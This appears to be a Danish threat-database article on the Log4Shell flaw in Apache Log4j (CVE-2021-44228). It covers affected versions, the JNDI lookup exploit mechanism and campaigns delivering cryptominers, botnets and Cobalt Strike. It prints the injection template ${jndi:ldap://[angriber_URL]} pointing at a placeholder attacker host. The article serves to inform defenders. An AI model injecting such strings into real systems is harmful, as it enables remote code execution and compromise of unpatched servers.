Threat Database Vulnerability Log4Shell Vulnerability

Log4Shell Vulnerability

Den 10. december 2021 blev en udnyttelse af en kritisk sårbarhed i den Apache Log4j Java-baserede logningsplatform frigivetoffentligt. Sporet som CVE-2021-44228 eller Log4Shell, påvirker sårbarheden Log4j-versioner fra Log4j 2.0-beta9 og op til 2.14.1. Trusselsaktører kan drage fordel af udnyttelsen til at etablere uautoriseret fjernadgang, eksekvere kode, levere malware-trusler eller indsamle oplysninger. Sårbarheden tildeles en kritisk status, da Log4j er meget brugt af virksomhedsapplikationer og cloud-tjenester.

Log4Shell tekniske detaljer

Udnyttelsen begynder med, at trusselsaktøren ændrer deres webbrowsers brugeragent. Så besøger de et websted eller søger efter en bestemt streng, der findes på websteder med formatet:

${jndi:ldap://[angriber_URL]}

Som et resultat vil strengen blive tilføjet til webserverens adgangslogfiler. Angriberne venter derefter på, at Log4j-applikationen parser disse logfiler og når den vedhæftede streng. I dette tilfælde vil fejlen udløses, hvilket får serveren til at foretage et tilbagekald til den URL, der findes i JNDI-strengen. Denne URL misbruges til at håndtere Base64-kodede kommandoer eller Java-klasserefterfølgende og udføre dem på den kompromitterede enhed.

Apache frigav hurtigt en ny version - Log4j 2.15.0, for at adressere og rette op på udnyttelsen, men en betydelig mængde sårbare systemer kunne forblive upatchede i en lang periode. Samtidig lagde trusselsaktører hurtigt mærke til Log4Shell zero-day sårbarheden og begyndte at scanne efter passende servere til at udnytte. Infosec-fællesskabet har sporet adskillige angrebskampagner, der bruger Log4Shell til at levere en bred vifte af malware-trusler.

Log4Shell bruges i Cryptominer, Botnet, Backdoor og dataindsamlingsangreb

En af de første trusselsaktører, der implementerede Log4Shell i deres operationer, var cyberkriminelle bag Kinsing- krypto-mining-botnettet. Hackerne brugte Log4Shell til at levere Base64-kodede nyttelaster og køre shell-scripts. Disse scripts rolle er at rense det målrettede system fra konkurrerende crypto-mining-trusler, før deres egen Kinsing-malware bliver eksekveret.

Netlab 360 opdagede trussel skuespillere hjælp sårbarheden til at installere versioner af Mirai og Muhstik botnets på de overtrådt enheder. Disse malware-trusler er designet til at tilføje inficerede systemer til et netværk af IoT-enheder og servere, som angriberne derefter kan instruere til at starte DDoS-angreb (Distributed Denial-of-Service) eller implementere krypto-minereefterfølgende.

Ifølge Microsoft Threat Intelligence Center var Log4j-udnyttelsen også målrettet af angrebskampagner, der droppede Cobalt Strike-beacons. Cobalt Strike er et legitimt softwareværktøj, der bruges til penetrationstest mod en virksomheds sikkerhedssystemer.Imidlertid har dens bagdørsfunktioner gjort det til en fælles del af arsenalet af adskillige trusselsaktørgrupper. Bagefter bruges den ulovlige bagdørsadgang til ofrets netværk til at levere næste trins nyttelast såsom ransomware, info-tyvere og andre malware-trusler.

Log4Shell kan udnyttes til at erhverve miljøvariabler, der indeholder serverdata. På denne måde kan angribere få adgang til værtens navn, OS-navnet, OS-versionsnummeret, brugernavnet som Log4j-tjenesten kører under og mere.

Trending

Mest sete

Indlæser...